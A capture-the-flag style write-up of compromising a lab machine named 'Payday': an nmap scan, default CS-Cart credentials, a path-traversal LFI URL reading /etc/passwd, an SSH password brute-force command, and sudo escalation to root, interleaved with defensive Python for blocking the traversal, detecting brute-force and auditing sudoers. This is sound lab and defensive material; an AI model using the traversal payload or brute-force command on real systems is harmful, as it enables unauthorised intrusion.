# Payday

![](/files/-MR9SIurKOT8QFq4FvQq)

## Nmap

```
sudo nmap 192.168.189.39 -p- -sS

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s
```

## HTTP

The default root page on port 80 takes us to a store page for CS-Cart.

![](/files/-MR9Tz1OMQjfxVxamA8b)

We can see from this page that this is a demo installation that is currently running. With that in mind we can try some common login credentials.

I tried admin:admin and was able to log in to the web application. After logging in I could not see that much had changed and was unable to find anything interesting. A quick Google search produces a potential authenticated RCE exploit.

{% embed url="https://www.exploit-db.com/exploits/48891" %}

![](/files/-MR9UuHb1kbfRAEoVgHe)

I could not find anywhere to upload to the file manager and after a short while decided not to proceed with this exploit for the time being.

## LFI

Further research on Google also turns up a potential LFI exploit for CS-Cart.

{% embed url="https://www.exploit-db.com/exploits/48890" %}

![](/files/-MR9VKT5PNayS-9SdQS8)

Let's test one of these and see if we can read /etc/passwd.

```
http://192.168.189.39/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
```

![](/files/-MR9XDS75nu79V6m_nIE)

We have confirmed LFI and have read the passwd file. We can take note of the user 'patrick', which is the last entry in the file.

I tried reading other common LFI paths and could not find further information. The user patrick did not appear to have any SSH keys in /home/patrick/.ssh/.
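The `classes_dir` request above works because the application builds an include path from user input and a trailing `%00` truncates whatever the code appends. The following Python is an added example, not code from this writeup or from CS-Cart: it shows the hardened form of such a path check (NUL rejection plus canonical-path containment under a hypothetical `INCLUDE_BASE`), and a small detector that flags the same request pattern in a constructed Apache-style access log. The document root, log format and log lines are assumptions made for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Hypothetical document root and include directory for the hardened check;
# the real CS-Cart layout is not assumed here.
WEB_ROOT = "/var/www/html"
INCLUDE_BASE = os.path.join(WEB_ROOT, "classes")

# Apache/nginx combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SENSITIVE_TARGETS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "/.ssh/")


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded traversal (%252e%252e%252f) is unwrapped."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_include(user_value: str) -> Optional[str]:
    """Hardened resolver for a classes_dir-style include parameter.

    Returns the absolute path that may be included, or None when the value is
    rejected: an embedded NUL (the %00 truncation trick), or a path that lands
    outside INCLUDE_BASE once '..' segments and symlinks are normalised.
    """
    decoded = fully_decode(user_value)
    if "\x00" in decoded:
        return None
    base = os.path.realpath(INCLUDE_BASE)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # commonpath rejects both '../' escapes and prefix tricks such as 'classes_evil'
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def flag_lfi_requests(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, reasons, decoded_path) for requests that look like LFI probes."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = fully_decode(m.group("path"))
        reasons = []
        if "\x00" in path:
            reasons.append("null-byte")
        if TRAVERSAL_RE.search(path):
            reasons.append("traversal")
        if any(target in path for target in SENSITIVE_TARGETS):
            reasons.append("sensitive-file")
        if reasons:
            hits.append((m.group("ip"), ",".join(reasons), path))
    return hits


# Constructed sample access log; the traversal request mirrors the one used above.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Jan/2021:12:00:01 +0000] "GET /index.php?dispatch=products.view&product_id=12 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [10/Jan/2021:12:00:07 +0000] "GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1840',
    '10.0.0.9 - - [10/Jan/2021:12:00:09 +0000] "GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 200 0',
    '10.0.0.5 - - [10/Jan/2021:12:00:12 +0000] "POST /admin.php?dispatch=auth.login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in flag_lfi_requests(SAMPLE_ACCESS_LOG):
        print(hit)
    print(resolve_include("../../../../../../etc/passwd%00"))  # rejected: None
    print(resolve_include("phpmailer"))                          # stays inside INCLUDE_BASE
```

Decoding more than once before checking matters: a WAF or log rule that only looks for a literal `../` misses the double-encoded variant in the third sample line, while the resolver above sees the same `../../etc/shadow` either way.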

## SSH Bruteforce

With a known user on the system we can try brute-forcing POP3/IMAP over telnet, or we can try `SSH`. I first set up `crackmapexec` to brute force SSH.

```
crackmapexec ssh 192.168.189.39 -u patrick -p /usr/share/wordlists/rockyou.txt
```

We soon find a valid set of credentials: `patrick:patrick`.

![](/files/-MR9XsTVTEf0c706sql0)
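A wordlist run like the one above leaves a very recognisable trail in `auth.log`: a burst of `Failed password` lines from one source, followed by an `Accepted password` once the guess lands. The Python below is an added example (not from this writeup or from crackmapexec) of the sliding-window detection a defender would run over those lines. The syslog layout, the two-minute window, the threshold and the sample log lines are all assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Tuple

# sshd lines in the classic syslog auth.log layout (no year in the timestamp).
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_syslog_ts(stamp: str, year: int = 2021) -> datetime:
    """syslog timestamps carry no year; the caller supplies it (the constructed log uses 2021)."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def detect_ssh_bruteforce(lines: List[str], threshold: int = 5,
                          window: timedelta = timedelta(minutes=2)) -> List[Tuple[str, str, str]]:
    """Sliding-window detector.

    Emits ("ip", "bruteforce", detail) once a source accumulates `threshold`
    failed logins inside `window`, and ("ip", "success-after-bruteforce", detail)
    if that same source later authenticates successfully, the signal that the
    guessing worked and the account needs attention, not just the source IP.
    """
    recent_failures = defaultdict(list)   # ip -> failure timestamps still inside the window
    flagged = set()
    alerts = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = parse_syslog_ts(m["ts"])
            q = recent_failures[m["ip"]]
            q.append(ts)
            while q and ts - q[0] > window:      # expire failures older than the window
                q.pop(0)
            if len(q) >= threshold and m["ip"] not in flagged:
                flagged.add(m["ip"])
                alerts.append((m["ip"], "bruteforce", f"{len(q)} failures within {window}"))
            continue
        m = ACCEPTED_RE.match(line)
        if m and m["ip"] in flagged:
            alerts.append((m["ip"], "success-after-bruteforce", f"user {m['user']}"))
    return alerts


# Constructed sample: five rapid failures and then a success from 10.0.0.9,
# plus one unrelated typo from 10.0.0.5 that must not trigger an alert.
SAMPLE_AUTH_LOG = [
    "Jan 10 12:01:00 payday sshd[1201]: Failed password for patrick from 10.0.0.9 port 50122 ssh2",
    "Jan 10 12:01:01 payday sshd[1202]: Failed password for patrick from 10.0.0.9 port 50124 ssh2",
    "Jan 10 12:01:02 payday sshd[1203]: Failed password for patrick from 10.0.0.9 port 50126 ssh2",
    "Jan 10 12:01:03 payday sshd[1210]: Failed password for invalid user admin from 10.0.0.5 port 41022 ssh2",
    "Jan 10 12:01:03 payday sshd[1204]: Failed password for patrick from 10.0.0.9 port 50128 ssh2",
    "Jan 10 12:01:04 payday sshd[1205]: Failed password for patrick from 10.0.0.9 port 50130 ssh2",
    "Jan 10 12:01:05 payday sshd[1215]: Accepted password for patrick from 10.0.0.9 port 50140 ssh2",
]

if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The second alert type is the one worth paging on: a threshold alone just says someone is guessing, whereas success after a burst of failures means the password was weak enough to be found and the account should be reset, with password authentication ideally replaced by keys.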

## Low Privilege Access

We now attempt to log in with `SSH`.

```
ssh patrick@192.168.189.39
```

![](/files/-MR9Y7SHg13SFm6nR76m)

## Privilege Escalation

Privilege escalation proved to be exceptionally easy on this machine. Before uploading any enumeration scripts I always perform a quick check of what we can run with sudo using `sudo -l`.

![](/files/-MR9YXMhIXfmFOKrSLFv)

Here we can see that patrick can run any command as any user with sudo. This is a quick win, as running /bin/bash through sudo as root spawns a root shell.

![](/files/-MR9YlWqdPjpY2nIRV8h)
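The rule behind this quick win is a sudoers entry of the form `patrick ALL=(ALL : ALL) ALL`. As an added example (not part of this writeup, and not the machine's real `/etc/sudoers`), the Python below parses sudoers-style lines and flags the grants a defender should not see on a production host: unrestricted `ALL` command specs, commands that are themselves shells, and `NOPASSWD` entries. The sample sudoers text and the list of shell binaries are constructed for the example.

```python
import re
from typing import List, Tuple

# user-or-%group  hosts = (runas) [TAG:]... command[, command...]
SUDOERS_RE = re.compile(
    r"^(?P<who>[%\w.+-]+)\s+(?P<hosts>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")
# Binaries that hand the caller an interactive shell as the runas user.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh",
          "/usr/bin/bash", "/usr/bin/zsh", "/bin/su", "/usr/bin/su"}


def audit_sudoers(text: str) -> List[Tuple[str, str, str]]:
    """Return (principal, severity, reason) for risky rules.

    Comments, Defaults and alias definitions are skipped; root's own entry is
    expected and ignored. When no (runas) is given, sudo defaults to root.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments, including '#include'
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SUDOERS_RE.match(line)
        if not m or m["who"] == "root":
            continue
        who = m["who"]
        runas = m["runas"] or "root"
        any_user = "ALL" in runas
        nopasswd = "NOPASSWD" in m["tags"]
        target = "any user" if any_user else runas
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append((who, "HIGH", f"may run any command as {target}"))
            elif cmd.split()[0] in SHELLS:
                findings.append((who, "HIGH", f"{cmd} yields an interactive shell as {target}"))
            elif nopasswd:
                findings.append((who, "MEDIUM", f"{cmd} runs without a password prompt"))
    return findings


# Constructed sample sudoers; the patrick line mirrors the grant seen in sudo -l above.
SAMPLE_SUDOERS = """\
# constructed sample, not the machine's real /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
patrick ALL=(ALL : ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, /bin/bash
backup  ALL=(root) /usr/bin/rsync
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

The `backup` entry is the shape a least-privilege grant should take: one fixed binary, run as root, password still required. Everything the auditor flags as HIGH is equivalent to handing out root, which is exactly what made this box's escalation a one-liner.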


